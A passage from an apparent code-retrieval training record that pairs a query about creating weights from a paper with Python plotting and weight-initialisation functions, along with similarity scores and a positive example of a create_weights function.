$\\rm \\mu Hz$')\n plt.ylabel(r'SNR')\n\n mn = min(star.ds.mode_id['f0']) -\\\n (max(star.ds.mode_id['f0'])-min(star.ds.mode_id['f0']))/7.\n mx = max(star.ds.mode_id['f0']) +\\\n (max(star.ds.mode_id['f0'])-min(star.ds.mode_id['f0']))/7.\n plt.xlim([mn,mx])\n\n plt.legend()\n plt.title('KIC ' + str(self.ds.epic))\n plt.show()\n fig.savefig(os.getcwd() + os.sep + 'DetTest1_plots' + os.sep +\\\n 'plot4_SNR' + self.ds.epic + '.pdf')", "def plot_data(indf, prefix='html'):\n list_of_plots = []\n# scatter_matrix(indf)\n# pl.savefig('scatter_matrix.png')\n# list_of_plots.append('scatter_matrix.png')\n\n for col in indf:\n pl.clf()\n# cond = indf[col].notnull()\n# v = indf[cond][col]\n v = indf[col]\n# nent = len(v)\n# hmin, hmax = v.min(), v.max()\n# xbins = np.linspace(hmin,hmax,nent)\n# hmin, hmax, nbin = BOUNDS[col]\n# xbins = np.linspace(hmin, hmax, nbin)\n v.hist(bins=20, histtype='step', normed=True, log=True)\n pl.title(col)\n pl.savefig('%s_hist.png' % col)\n list_of_plots.append('%s_hist.png' % col)\n\n create_html_page_of_plots(list_of_plots, prefix)\n return", "def display(self):\r\n \r\n plt.rcParams['font.size'] = 14\r\n plt.rcParams['axes.linewidth'] = 1.2 # 1.2 for single plot, 0.5 for all 6\r\n plt.rcParams['lines.linewidth'] = 20.0 # Aah, this doesn't work because line width is changed later on\r\n\r\n cwd = os.getcwd() # Gets current working directory.\r\n cwd = cwd.replace('\\\\', '/')\r\n path = cwd + directory # This is the folder all the results are stored in.\r\n \r\n if type(array_element) == str:\r\n dataframes = [file + array_element] # This is to pass a single csv file\r\n else:\r\n dataframes = [file + i for i in array_element] # This is a list so you can pass multiple csv files to be overlayed on the same plot.\r\n\r\n colours = ['black', 'darkred', 'darkmagenta', 'darkturquoise', 'saddlebrown'] # Array of colours for the lines.\r\n\r\n dfE = pd.read_csv(cwd + \"/experimental_data.csv\") # Reads in the experimental data as a pandas dataframe.\r\n\r\n # Rescale the x-axis of the experimental data.\r\n ratio_of_capacities = 272.4 / 338.313338 # experimental maximum capacity / theoretical maximum capacity\r\n dfE[\"x_theo\"] = ratio_of_capacities * dfE[\"x\"]\r\n # 'x' is the experimental x and 'x_theo' is the theoretical x.\r\n\r\n # Second derivative of enthalpy for experimental data. One w/ respect to the experimental x and one w/ respect to theoretical x.\r\n secder_enthalpy_experimental_x = np.gradient(np.array(dfE['Enthalpy dH/dx']), np.array(dfE['x']))\r\n secder_enthalpy_experimental_x_theo = np.gradient(np.array(dfE['Enthalpy dH/dx']), np.array(dfE['x_theo']))\r\n dfE['secder enthalpy x'] = secder_enthalpy_experimental_x\r\n dfE['secder enthalpy x theo'] = secder_enthalpy_experimental_x_theo\r\n\r\n # vertical shift on p.m. entropy for vibrational effect\r\n vibrational_shift = 0.0108 # eV K this includes being multiplied by the ratio of capacities.\r\n dfE[\"Entropy dS/dx\"] = (dfE[\"Entropy dS/dx\"]) - vibrational_shift\r\n\r\n # Integrates the p.m. entropy\r\n entropy_list_experimental = integrate.cumtrapz(dfE['Entropy dS/dx'], dfE['x'],\r\n initial=0) # Contains the entropy values\r\n dfE['Entropy'] = entropy_list_experimental\r\n\r\n dfE['x_new'] = ((dfE['x_theo'] - dfE['x_theo'].iloc[0]) * dfE['x_theo'][73]) / (dfE['x_theo'][73] - dfE['x_theo'].iloc[0]) # Rescales the line so that the experimental data starts at 0.\r\n dfE['x'] = ((dfE['x'] - dfE['x'].iloc[0]) * dfE['x'][73]) / (dfE['x'][73] - dfE['x'].iloc[0]) # Same as above but for experimental x axis.\r\n\r\n # Calculates the analytical solution\r\n points = 1000\r\n x_pos = np.linspace(0, 1, points) # x for p.m. entropy\r\n y_pos = np.linspace(0, 1, points) # y for p.m. etropy\r\n s_x = np.linspace(0, 1, points) # x for entropy\r\n s_y = np.linspace(0, 1, points) # y for entropy\r\n l = 0.329217689 # This must be the same as what was used in the main script\r\n R = -0.0000862 # eV/K.Site\r\n T = 288 # K\r\n for index, x in enumerate(x_pos):\r\n if x < l:\r\n s_y[index] = (R * (x * np.log(x / l) - (x - l) * np.log((l - x) / l))) * T\r\n y_pos[index] = T * R * (np.log(x / l) - np.log((l - x) / l))\r\n else:\r\n s_y[index] = (R * l * (\r\n (x / l - 1) * np.log(x / l - 1) + (1 - x) / l * np.log((1 - x) / l) - (1 - l) / l * np.log(\r\n (1 - l) / l))) * T\r\n y_pos[index] = T * R * (np.log(x / l - 1) - np.log(1 / l - x / l))\r\n\r\n # Calculates the single solid state entropy\r\n x_ent = np.linspace(0, 1, points)\r\n y_ent = np.linspace(0, 1, points)\r\n for index, x in enumerate(x_ent):\r\n y_ent[index] = T * R * (x * np.log(x) + (1-x) * np.log(1-x))\r\n \r\n \"\"\"\r\n #\r\n #\r\n # Create plot and formats\r\n #\r\n #\r\n \"\"\"\r\n \r\n fig, axes = plt.subplots(nrows=num_row, ncols=num_col, constrained_layout=True, squeeze=False)\r\n # squeeze=False is needed to prevent errors when plotting a single subplot\r\n plt.rc('legend', fontsize=13, handlelength=1)\r\n plt.rc('tick')\r\n lw = 1.5 # Line width\r\n \r\n plt.tick_params(bottom=True, top=True, left=True, right=True)\r\n plt.tick_params(labelbottom=True, labeltop=False, labelleft=True, labelright=False)\r\n plt.tick_params(direction='in', width=1.2, length=4.5, pad=3) # For single plot\r\n # plt.tick_params(direction='in', width=1, length=4.5, pad=3) # For multiple plots\r\n\r\n marker_list = ['v', '^', 'p', 'o']\r\n mark_size = 3 #0.7 for 6 plots\r\n \r\n colours = ['#176ba0', '#af4bce', 'orangered', '#48a11b', '#3caea3'] #'#af4bce'\r\n common_legend = ['400 Averaging Steps', '800 Averaging Steps', '2000 Averaging Steps']\r\n \r\n if num_col==2 and num_row==3: # This will work when using the original axes dimensions (3 rows, 2 columns)\r\n placement = dict([\r\n ('voltage', axes[0, 0]),\r\n ('dS/dx', axes[0, 1]),\r\n ('dQ/dV', axes[1, 0]),\r\n ('dH/dx', axes[1, 1]),\r\n ('S', axes[2, 0]),\r\n ('d/dx(dH/dx)', axes[2, 1])\r\n ])\r\n else: # If axes dimensions are different, I'm probably trying to plot one graph\r\n \"\"\"\r\n If plotting more than one graph, the position on the plot in the subplot can be adjusted\r\n by appropriately altering the axes[] parameter. For the graphs that are not being plotted, \r\n leave their position as axes[0, 0].\r\n \"\"\"\r\n placement = dict([\r\n ('voltage', axes[0, 0]),\r\n ('dS/dx', axes[0, 0]),\r\n ('dQ/dV', axes[0, 0]),\r\n ('dH/dx', axes[0, 0]),\r\n ('S', axes[0, 0]),\r\n ('d/dx(dH/dx)', axes[0, 0])\r\n ])\r\n \r\n # Plots all of the experimental data\r\n if experimental_plot == True:\r\n if pick_plot['voltage'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['voltage'], x='x_new', y='OCV')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['voltage'], x='x', y='OCV')\r\n \r\n if pick_plot['dS/dx'] == True:\r\n ax2 = dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['dS/dx'], x='x_new', y='Entropy dS/dx')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['dS/dx'], x='x', y='Entropy dS/dx')\r\n \r\n if pick_plot['dQ/dV'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['dQ/dV'], x='OCV', y='dQdV') \r\n \r\n if pick_plot['dH/dx'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['dH/dx'], x='x_new', y='Enthalpy dH/dx')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['dH/dx'], x='x', y='Enthalpy dH/dx')\r\n \r\n if pick_plot['S'] == True:\r\n ax5 = dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['S'], x='x_new', y='Entropy')\r\n \r\n if pick_plot['d/dx(dH/dx)'] == True:\r\n dfE.plot(linestyle='-', color='darkgreen', lw=lw, ax=placement['d/dx(dH/dx)'], x='x_new', y='secder enthalpy x theo')\r\n dfE.plot(linestyle='-', color='darkblue', lw=lw, ax=placement['d/dx(dH/dx)'], x='x', y='secder enthalpy x')\r\n\r\n # Iterate through all the data to be plotted\r\n if simulation_plot == True:\r\n for count, df in enumerate(dataframes):\r\n df1 = pd.read_csv(path + df) # reads file into a dataframe.\r\n \r\n df1 = df1.replace(0, np.nan).dropna(axis=0, how='all') # For the rows with all '0' entries they are replaced with 'nan' and then these rows are dropped.\r\n df1 = df1.replace(np.nan, 0) # As some legitimate 0 entries such as 0 volts we flip back the remaining from 'nan' to 0.\r\n \r\n # Integrates the p.m. entropy\r\n entropy_list = integrate.cumtrapz(df1['Partial molar entropy'], df1['Total mole fraction'],\r\n initial=0) # Contains the entropy values\r\n df1['Entropy'] = entropy_list\r\n \r\n # Rescale voltage profile and p.m. enthalpy by the chain rule.\r\n df1[\"adjusted voltage\"] = df1[\"Chemical potential\"] * ratio_of_capacities\r\n df1[\"adjusted enthalpy\"] = df1[\"Partial molar enthalpy\"] * ratio_of_capacities\r\n df1[\"adjusted entropy\"] = df1[\"Partial molar entropy\"] * ratio_of_capacities\r\n df1[\"adjusted dq/de\"] = df1[\"dq/de\"] * (1/ratio_of_capacities)**2\r\n \r\n # Differentiate the p.m. enthalpy to get the second derivative.\r\n pm_enthalpy = np.array(df1['adjusted enthalpy'])\r\n mole_fraction = np.array(df1['Total mole fraction'])\r\n secder_enthalpy = np.gradient(pm_enthalpy, mole_fraction)\r\n df1['secder enthalpy'] = secder_enthalpy\r\n \r\n if pick_plot['voltage'] == True:\r\n ax1 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['voltage'], x='Total mole fraction', y='adjusted voltage')\r\n ax1.set_xlim([0, 1])\r\n ax1.set_xlabel('Na content $[x]$')\r\n ax1.set_ylabel('Voltage $[V]$')\r\n ax1.legend(common_legend) \r\n # ax1.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data'])\r\n \r\n if pick_plot['dS/dx'] == True:\r\n ax2 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['dS/dx'], x='Total mole fraction', y='adjusted entropy')\r\n # ax2.plot(x_pos, y_pos, linewidth=lw, color='red') # Plots the ideal p.m. entropy\r\n ax2.set_xlim([0, 1])\r\n ax2.set_xlabel('Na content $[x]$')\r\n ax2.set_ylabel('$\\\\frac{dS}{dx}$ $[eV K/site]$')\r\n ax2.legend(common_legend) \r\n # ax2.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data', 'Analytical solution'])\r\n \r\n if pick_plot['dQ/dV'] == True:\r\n ax3 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['dQ/dV'], x='Chemical potential', y='adjusted dq/de') \r\n ax3.set_xlim([-0.1, 1])\r\n ax3.set_xlabel('Voltage $[V]$')\r\n ax3.set_ylabel('$\\\\frac{dQ}{dV}$ [$\\mathregular{eV^{-1}}$]')\r\n ax3.legend(common_legend)\r\n # ax3.legend(['Experimental data', 'Monte Carlo Data'])\r\n \r\n if pick_plot['dH/dx'] == True:\r\n ax4 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['dH/dx'], x='Total mole fraction', y='adjusted enthalpy')\r\n ax4.set_xlim([0, 1])\r\n ax4.set_xlabel('Na content $[x]$')\r\n ax4.set_ylabel('$\\\\frac{dH}{dx}$ $[eV/site]$')\r\n ax4.legend(common_legend) \r\n # ax4.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data'])\r\n \r\n if pick_plot['d/dx(dH/dx)'] == True:\r\n ax5 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['d/dx(dH/dx)'], x='Total mole fraction', y='secder enthalpy')\r\n ax5.set_xlim([0, 1])\r\n ax5.set_ylim([0, 6])\r\n ax5.set_xlabel('Na content $[x]$')\r\n ax5.set_ylabel('$\\\\frac{d^2H}{dx^2}$ $[eV/site]$')\r\n ax5.legend(common_legend)\r\n \r\n # ax5.legend(['Experimental data (Adjusted x)', 'Raw experimental data', 'Monte Carlo data'])\r\n \r\n if pick_plot['S'] == True:\r\n ax6 = df1.plot(linestyle='-', color=colours[count], lw=lw, marker=marker_list[count], markeredgecolor=colours[count],\r\n markersize=mark_size, ax=placement['S'], x='Total mole fraction', y='Entropy')\r\n \r\n # ax6.plot(s_x, s_y, linewidth=lw, color='red') # Plots the entropy for l=0.32...\r\n # ax6.plot(x_ent, y_ent, linewidth=lw, color='grey') # Plots the entropy for solid state solution.\r\n ax6.set_xlim([0, 1])\r\n ax6.set_xlabel('Na content $[x]$')\r\n ax6.set_ylabel('S $[eV K/site]$')\r\n ax6.legend(common_legend)\r\n # ax6.legend(['Experimental data', 'Monte Carlo data', 'Analytical solution', 'Solid state solution'], loc='upper right', bbox_to_anchor=(0.75, 0.5))\r\n \r\n \r\n\r\n # parameter_file = open(path + \"/Input_arguments_\" + uid + \".txt\", \"w\")\r\n # parameter_file.write(str(self.args))\r\n # parameter_file.close()\r\n\r\n # manager = plt.get_current_fig_manager()\r\n # # manager.resize(*manager.window.maxsize())\r\n # # fig_path = cwd + \"/Na_plot_results.png\"\r\n # # plt.savefig(path + \"/Na_monte_carlo_plot_\" + uid + \".png\")\r\n # plt.show()\r\n \r\n plt.savefig(\"Varying sps Overlaid Plots - dQ_dV\", dpi = 300)\r\n\r\n plt.show()", "def grafCasosAtivos(tipPDF):\n\n\t\tdf = pd.read_csv('dadosPaises.csv') #dataFrame que recebe a tabela de dados\n\t\tdf = df.sort_values(by=['Casos Ativos'], ascending=False) #ordena pela coluna 'casos ativos' de forma descendente\n\t\tdf2 = df[:5] # Separa em um novo dataframe as 5 primeiras linhas\n\n\t\tfig, ax = plt.subplots()\n\n\t\tindex = np.arange(len(df2['Casos Ativos'])) #indice para definir as posicoes dos labels\n\t\tbar_width = 0.45 #grossura da barra\n\t\tscore_label = np.arange(0,50000,5000) #array com volares a serem apresentados no eixo y\n\t\tbar = ax.bar(index, df2['Casos Ativos'], bar_width, label='Casos Ativos',color='#ff4500')\n\t\t\n\t\t#setting axis labels\n\t\tax.set_xticks(index) #distancia entre barras\n\t\tax.set_xticklabels(df2['Dados do País']) #label das barras\n\t\tax.set_yticks(score_label) #distancia entre marcas do eixo y\n\t\tax.set_yticklabels(score_label) #labels das marcas do eixo y\n\t\tax.legend() #legenda\n\n\t\t#ciclo para plotar os labels\n\t\tfor i in index:\n\t\t\tax.annotate('{}'.format(bar[i].get_height()), #string a ser plotada\n\t\t\t\t\t\txy=(bar[i].get_x(),bar[i].get_height()), #local da plotagem do label\n\t\t\t\t\t\txytext=(0,2), #movimentacao adicional do label\n\t\t\t\t\t\ttextcoords='offset points',\n\t\t\t\t\t\tva='bottom'\n\t\t\t\t\t\t)\n\n\t\tplt.title('Paises com mais casos ativos')\n\n\t\t#Se true, o tipo selecionado sera pdf, senao png\n\t\tif tipPDF:\n\t\t\tnomFig = 'grafico.pdf'\n\t\telse :\n\t\t\tnomFig = 'grafico.png'\t\n\t\tplt.savefig(nomFig) #salva a imagem (poder ser salvo como pdf mudando o nome do arquivo", "def plot_data_pca(data_dict):\n f = plt.figure()\n ndata, ntime, nhidden = data_dict['hiddens'].shape\n\n print('Number of data examples: ', ndata)\n print('Number of timesteps: ', ntime)\n print('Number of data dimensions: ', nhidden)\n pca = PCA(n_components=100)\n pca.fit(onp.reshape(data_dict['hiddens'], [ndata * ntime, nhidden]))\n\n plt.plot(onp.arange(1, 16), onp.cumsum(pca.explained_variance_ratio_)[0:15],\n '-o');\n plt.plot([1, 15], [0.95, 0.95])\n plt.xlabel('PC #')\n plt.ylabel('Cumulative Variance')\n plt.xlim([1, 15])\n plt.ylim([0.3, 1]);\n return f", "def figure_2(df):\n\n sns.set(style=\"white\", palette=sns.color_palette(\"cubehelix\", 6))\n f, axes = plt.subplots(4, 1, figsize=(6, 9)) # , sharex=True)\n sns.despine(top=True, bottom=True)\n # f.suptitle(\"Etiology of Central Events, Grouped by %Central Events\")\n\n OSA_pure_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Mainly OSA\"], return_df=True).sort_values(\"Dx\"))\n OSA_predom_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Combined OSA/CSA\"], return_df=True).sort_values(\"Dx\"))\n CSA_predom_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Predominantly CSA\"], return_df=True).sort_values(\"Dx\"))\n CSA_pure_hist = replace_etiology_labels(histo_dx_includes(df.loc[df['BaseDx'] == \"Pure CSA\"], return_df=True).sort_values(\"Dx\"))\n\n # Create count plot for each #CSA on the left, then a Pie Chart with proportion on the right\n\n hatches = ['///', 'xxx', '---', '', '']\n face_color = ['white', 'white', 'white', 'white', 'dimgrey']\n\n # Pure OSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=OSA_pure_hist, ax=axes[3])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[3].set(xlabel=\"Number of Patients\", ylabel=\"<10% CSA\")\n\n # Predom OSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=OSA_predom_hist, ax=axes[2])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[2].set(xlabel=\"\", ylabel=\"10-49.9% CSA\")\n\n # Predom CSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=CSA_predom_hist, ax=axes[1])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[1].set(xlabel=\"\", ylabel=\"50-90% CSA\")\n\n # Pure CSA\n bar = sns.barplot(x=\"Count\", y=\"Dx\", data=CSA_pure_hist, ax=axes[0])\n for i, this_bar in enumerate(bar.patches):\n # Set a different hatch for each bar\n this_bar.set_edgecolor('black')\n this_bar.set_facecolor(face_color[i])\n this_bar.set_hatch(hatches[i])\n axes[0].set(xlabel=\"\", ylabel=\">90% CSA\")\n\n # Combined X axis for L side\n axes[3].get_shared_x_axes().join(axes[3], axes[2], axes[1], axes[0])\n axes[0].set_xticklabels(\"\")\n axes[1].set_xticklabels(\"\")\n axes[2].set_xticklabels(\"\")\n # Leave bottom aka [3,0] labels in\n\n # Resize all\n axes[0].autoscale()\n axes[1].autoscale()\n axes[2].autoscale()\n axes[3].autoscale()\n\n f.tight_layout(rect=[0, 0, 1, 1]) # .95 to leave space for title\n f.savefig('Figure 2 - etio by perc csa', dpi=100)\n # plt.show()", "def plot_word_class_pr_genre(df):\n df['nouns'] = df['nouns'] * 100\n df['verbs'] = df['verbs'] * 100\n df['adverbs'] = df['adverbs'] * 100\n # plotting nouns\n plotting_helper_method('nouns', 'genre', df)\n plt.title('Amount of nouns pr song pr. genre')\n plt.xlabel(\"Amount of nouns in each song\")\n plt.ylabel('Genre')\n plt.legend()\n plt.show()\n # plt.savefig('src/visualization/feature_plots/nouns_pr_genre_plot')\n\n # plotting verbs\n plotting_helper_method('verbs', 'genre', df)\n plt.title('Amount of verbs pr song pr. genre')\n plt.xlabel('Amount of verbs in each song')\n plt.ylabel('Genre')\n plt.legend()\n plt.show()\n # plt.savefig('src/visualization/feature_plots/verbs_pr_genre_plot')\n\n # plotting adverbs\n plotting_helper_method('adverbs', 'genre', df)\n plt.title('Amount of adverbs pr song pr. genre')\n plt.xlabel('Amount of adverbs in each song')\n plt.ylabel('Genre')\n plt.legend()\n plt.show()\n # plt.savefig('src/visualization/feature_plots/adverbs_pr_genre_plot')" ]
[ "0.7190156", "0.6753629", "0.60996735", "0.6064925", "0.6016448", "0.6008773", "0.60022396", "0.60006684", "0.5999985", "0.59736115", "0.5944627", "0.59434086", "0.5941799", "0.5931249", "0.5897575", "0.5877158", "0.5876371", "0.5840248", "0.58335423", "0.58302295", "0.58285284", "0.58272463", "0.5807024", "0.5799569", "0.57845443", "0.5781996", "0.5779757", "0.5770024", "0.575117", "0.5739089", "0.57363075", "0.5735732", "0.5713691", "0.5693648", "0.5693578", "0.56858295", "0.56805944", "0.56687164", "0.5658263", "0.5648382", "0.564504", "0.5644673", "0.56430984", "0.56416816", "0.5638266", "0.5636274", "0.56346494", "0.56346226", "0.5629099", "0.5628261", "0.5614559", "0.56079715", "0.5606076", "0.5605636", "0.55997616", "0.5580656", "0.5579532", "0.556964", "0.5567809", "0.55675817", "0.5566145", "0.5564619", "0.5561161", "0.55587965", "0.55553675", "0.5551361", "0.5542913", "0.5542413", "0.5533799", "0.55314314", "0.5527168", "0.5526548", "0.5526236", "0.5522208", "0.55158806", "0.55117553", "0.5511285", "0.5507037", "0.5503371", "0.54993296", "0.5497811", "0.549305", "0.5489936", "0.5488964", "0.5487613", "0.5484082", "0.54818964", "0.5474708", "0.54729474", "0.5472021", "0.54715574", "0.54663956", "0.54663956", "0.5466015", "0.5461071", "0.54608077", "0.54574543", "0.5455361", "0.5455204", "0.54476535" ]
0.7230312
0
Create weights as defined in Section 5.1 of our paper.
def create_weights(N, weights_type): if weights_type == "uniform": weights = np.array([1 / N,] * N) elif weights_type == "decreasing": normaliser = sum([1 / i for i in range(1, N + 1)]) weights = np.array([1 / (i * normaliser) for i in range(1, N + 1)]) elif weights_type == "increasing": normaliser = sum([1 / i for i in range(1, N + 1)]) weights = np.array([1 / ((N + 1 - i) * normaliser) for i in range(1, N + 1)]) elif weights_type == "centred": if N % 2 == 1: normaliser = sum([1 / (abs((N + 1) / 2 - i) + 1) for i in range(1, N + 1)]) weights = np.array( [1 / ((abs((N + 1) / 2 - i) + 1) * normaliser) for i in range(1, N + 1)] ) else: normaliser = sum( [1 / (abs((N + 1) / 2 - i) + 0.5) for i in range(1, N + 1)] ) weights = np.array( [ 1 / ((abs((N + 1) / 2 - i) + 0.5) * normaliser) for i in range(1, N + 1) ] ) else: raise ValueError( 'The value of weights_type should be "uniform" or' '"decreasing" or "increasing" or "centred".' ) return weights
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_weights(self):\n gate_size = self._hidden_size * self._num_gates\n # Compute the shape of weight and bias.\n matrix_shapes, bias_shapes = [], []\n for layer in range(self._num_layers):\n for direction in range(self._num_directions):\n layer_input_size = self._input_size if layer == 0 \\\n else self._hidden_size * self._num_directions\n w_ih_shape = [gate_size, layer_input_size]\n w_hh_shape = [gate_size, self._hidden_size]\n b_ih_shape, b_hh_shape = [gate_size], [gate_size]\n matrix_shapes.extend([w_ih_shape, w_hh_shape])\n bias_shapes.extend([b_ih_shape, b_hh_shape])\n # Create single float32 weights.\n weights_count = 0\n self._weights_shapes = matrix_shapes + bias_shapes\n for shape in self._weights_shapes:\n weights_count += math_util.prod(shape)\n self._weights = Tensor([weights_count])\n self._weights.requires_grad = True", "def generate_weights(sizes):\n weights = {}\n weights[\"w\"] = []\n weights[\"b\"] = []\n for i in range(len(sizes)-2):\n weights[\"w\"].append(np.random.randn(sizes[i], sizes[i+1]))\n weights[\"b\"].append(np.random.randn(sizes[i+1]))\n weights[\"w_final\"] = np.random.randn(sizes[-2], sizes[-1])/np.sqrt(sizes[-1])\n weights[\"b_final\"] = np.random.randn(sizes[-1])\n return weights", "def weightGenerate(self):\n\t\tfor i in range(0, self.numberOfInput):\n\t\t\tself.weight.append(random.random()-0.5)", "def _generate_weights(self):\n weights = [random.uniform(0, 1) for x in range(self.num_weights)]\n return self._normalize_weights(weights)", "def init_weights_(self):\n raise NotImplementedError", "def get_weights(self):", "def weights_initializer(self):\n self.weights = [np.random.normal(0, 1 / np.sqrt(x), (x, y)) for x, y in list(zip(self.structure[1:], self.structure[:-1]))]", "def InitWeights(self):\n self.w = -1 + 2 * np.random.rand(self.num_of_inputs,)\n self.w0 = -1 + 2 * np.random.rand()", "def gen_W(users, items, ratings):\n\n # initiate graph\n user = users.tolist()\n item = items.tolist()\n rating = ratings.tolist()\n B = nx.Graph()\n B.add_nodes_from(user, bipartite=0)\n B.add_nodes_from(item, bipartite=1)\n\n # create edges\n for i in range(len(user)):\n B.add_edges_from([(user[i], item[i])])\n B[user[i]][item[i]]['weight'] = rating[i]\n\n users_unique = users.unique() \n items_unique = items.unique()\n\n # BiAdjacency matrix - for bipartite network\n W = biadjacency_matrix(B, users_unique,items_unique).toarray()\n\n # sparce form of Biadjacency matrix\n W = spa.csr_matrix(W)\n print('Shape of W: '+str(W.shape))\n\n return W, users_unique, items_unique", "def _create_weights(self):\n\n self.mu_W = tf.get_variable(\n name=\"mu_W\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim, self.z_dim])\n\n self.mu_b = tf.get_variable(\n name=\"mu_b\", initializer=tf.random_normal_initializer(),\n shape=[self.z_dim])\n\n self.log_sig_sq_W = tf.get_variable(\n name=\"log_sig_sq_W\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim, self.z_dim])\n\n self.log_sig_sq_b = tf.get_variable(\n name=\"log_sig_sq_b\", initializer=tf.random_normal_initializer(),\n shape=[self.z_dim])\n \n self.y_W = tf.get_variable(\n name=\"y_W\", initializer=tf.random_normal_initializer(),\n shape=[self.z_dim, self.rnn_dim])\n\n self.y_b = tf.get_variable(\n name=\"y_b\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim])\n \n self.softmax_W = tf.get_variable(\n name=\"softmax_W\", initializer=tf.random_normal_initializer(),\n shape=[self.rnn_dim, self.vocabulary_size])\n \n self.softmax_b = tf.get_variable(\n name=\"softmax_b\", initializer=tf.random_normal_initializer(),\n shape=[self.vocabulary_size])", "def init_weight(w):\n shape = w.shape\n if len(shape) == 4:\n i, o, u, v = shape\n k = np.sqrt(6 / (i * u * v + o * u * v))\n w.data.uniform_(-k, k)\n elif len(shape) == 2:\n k = np.sqrt(6 / sum(shape))\n w.data.uniform_(-k, k)\n elif len(shape) == 1:\n w.data.zero_()", "def _initialize_weights(self):\n pass", "def gen_tb_tb_weights(weight=1.):\r\n W = np.zeros([8, 8])\r\n sinusoid = -(np.cos(np.linspace(0, 2 * np.pi, 8, endpoint=False)) - 1) / 2\r\n for i in range(8):\r\n values = np.roll(sinusoid, i)\r\n W[i, :] = values\r\n return weight * W", "def _generate_weights(self):\n weights = []\n for i in range(1, len(self.layers) - 1):\n weights.append(2 * np.random.random(\n (self.layers[i - 1] + 1, self.layers[i] + 1)) - 1)\n weights.append(2 * np.random.random(\n (self.layers[i] + 1, self.layers[i + 1])) - 1)\n return weights", "def init_weights(self):\n \n self.w = np.random.randn(self.D) / np.sqrt(self.D)", "def init_weights(self, dims):\n self.W = np.random.normal(size=dims) * 0.0001", "def initializeWeights(n_in,n_out):\r\n \r\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\r\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\r\n return W", "def initializeWeights(n_in,n_out):\r\n \r\n epsilon = sqrt(6) / sqrt(n_in + n_out + 1);\r\n W = (np.random.rand(n_out, n_in + 1)*2* epsilon) - epsilon;\r\n return W", "def weights(self):\r\n\t\treturn None", "def generate_weight(N, J, delta, sigma, z):\n J = numpy.asarray(J)\n delta = numpy.asarray(delta)\n sigma = numpy.asarray(sigma)\n x = numpy.linspace(-0.5, 0.5, N).reshape((1, -1))\n W = numpy.empty((2 * N, 2 * N))\n W[:N, :N] = weight(x, J[0, 0], delta[0, 0], sigma[0, 0], z[:N, :N])\n W[N:, :N] = weight(x, J[1, 0], delta[1, 0], sigma[1, 0], z[N:, :N])\n W[:N, N:] = weight(x, -J[0, 1], -delta[0, 1], sigma[0, 1], z[:N, N:])\n W[N:, N:] = weight(x, -J[1, 1], -delta[1, 1], sigma[1, 1], z[N:, N:])\n return W", "def gen_in_weights(self):\n\n gen = Generator(device = self.device).manual_seed(self.random_seed)\n n, m = self.n_nodes_, self.n_inputs_\n in_w_shape_ = (n, m)\n print('m,n', m,n)\n\n #at the moment all input weight matrices use uniform bias.\n self.bias = rand( n, 1, generator = gen, device = self.device) * 2 - 1\n\n #weights\n if self.input_weight_type_ == \"uniform\":\n self.in_weights = rand((n,m), generator = gen, device = self.device)\n self.in_weights = self.in_weights * 2 - 1\n print('in_weights', self.in_weights.shape)\n\n elif self.input_weight_type_ == \"exponential\":\n printc(\"BUILDING SIGN_\", 'fail')\n sign1 = random_state.choice([-1, 1], size= (in_w_shape_[0], in_w_shape_[1]//2))\n sign2 = random_state.choice([-1, 1], size= (in_w_shape_[0], in_w_shape_[1]//2))\n\n self.sign_dual = (sign1, sign2)\n self.sign = np.concatenate((sign1, sign2), axis = 1)\n\n #regularization\n self.feedback_weights = rand(n, 1, **self.tensorArgs, generator = gen) * 2 - 1\n\n #regularization\n self.noise_z = normal(0, 1, size = (n, m), **self.tensorArgs, generator = gen)", "def create_weight_matrices(self):\n rad = 1 / np.sqrt(self.no_of_in_nodes)\n X = truncated_normal(mean=0, \n sd=1, \n low=-rad, \n upp=rad)\n self.wih = X.rvs((self.no_of_hidden_nodes, 